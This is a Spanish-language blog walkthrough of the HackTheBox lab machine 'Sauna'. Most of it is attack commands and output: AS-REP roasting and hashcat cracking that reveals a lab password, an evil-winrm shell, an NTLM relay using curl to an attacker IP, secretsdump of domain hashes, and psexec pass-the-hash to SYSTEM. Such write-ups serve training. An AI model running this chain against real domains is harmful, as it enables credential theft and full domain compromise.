Feb 18 2020
0

Resumen

Aprovechando que la página contenía información del staff de trabajadores se pudo generar una lista de usuarios válidos, con esto se obtuvo un acceso sin privilegios elevados, sin embargo tenía un soporte legacy esto permitió usar la repetición NTLM (ntlmrelay) se pudo obtener credenciales privilegiadas.

Punto de Apoyo

Enumeramos de manera convencional

Ver la página y escribir los nombres del equipo en un archivo txt.

Usar este script para generar posibles usuarios del active directory.

https://github.com/Sh4rpe/UNCreator/blob/master/README.md

Obtener Usuario

GetNPUsers.py EGOTISTICALBANK/ -usersfile ../../../hackthebox/sauna/users.txt  -no-pass -dc-ip sauna.htb -format hashcat -outputfile fsmith.hash

hashcat -m 18200 –force -a 0 fsmith.hash ../../wordlist/rockyou.txt 

$krb5asrep$23$FSmith@EGOTISTICALBANK:0bd43c2e6f733ab7df687d0e70dc037b$ebd9c1d21a76485fa5419ff349cb692699b4cc1700dfd60efdd34d2c224f7d9194a46c377ce9d9492f66426d995783e3b49c2fc857bdc278be0eb150295b767ccaaa560833b4caee4486529467a76a39b5d749cbb5a64fd63cfc67269bea4bea8f44e5fcfe3b6d615d5ff36bc378b29fc99d5f389899f0818ef145a17f8a2ba93962b07269dc3e865da6555b3a435573f96800fd80435adb5acc13748addc4270bd14389ac09bba0a5e5057e221800ae10a32723e415b8d756f99e492fbe68efe0c1d620a06af8b71364ff2eda84875daf5e5c2e809bc44e5c1298f7628f0faeb7b257d5feba44cd68f667e55169f801fc12ef01f0c3a5e7b4:Thestrokes23

evil-winrm -u fsmith -p Thestrokes23 -i sauna.htb 

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> 

Si se ve los grupos al lo que pertenece fsmith, se puede ver que hay un grupo que llama la atención. Pre-Windows 2000 Compatible Access

C:\Users\FSmith\Documents> whoami /all

USER INFORMATION
—————-

User Name              SID                                            
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105


GROUP INFORMATION
—————–

Group Name                                  Type             SID          Attributes                                         
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                    
PRIVILEGES INFORMATION
———————-

Privilege Name                Description                    State   
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Obteniendo Root

En este sitio se tiene una guía para enumerar.

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://raw.githubusercontent.com/absolomb/WindowsEnum/master/WindowsEnum.ps1

DefaultDomainName DefaultUserName                 DefaultPassword            
—————– —————                 —————            
EGOTISTICALBANK   EGOTISTICALBANK\svc_loanmanager Moneymakestheworldgoround!

ntlmrelayx.py -t ldap://sauna.htb –escalate-user svc_loanmgr -domain EGOTISTICALBANK
curl -v –ntlm -u svc_loanmgr:Moneymakestheworldgoround! http://10.10.14.24/privexchange/
secretsdump.py  EGOTISTICALBANK/svc_loanmgr:’Moneymakestheworldgoround!’@sauna.htb -just-dc

psexec.py -hashes ‘aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff’ EGOTISTICALBANK/[email protected]
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
SAUNA

Publicado enBlog Writeups

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *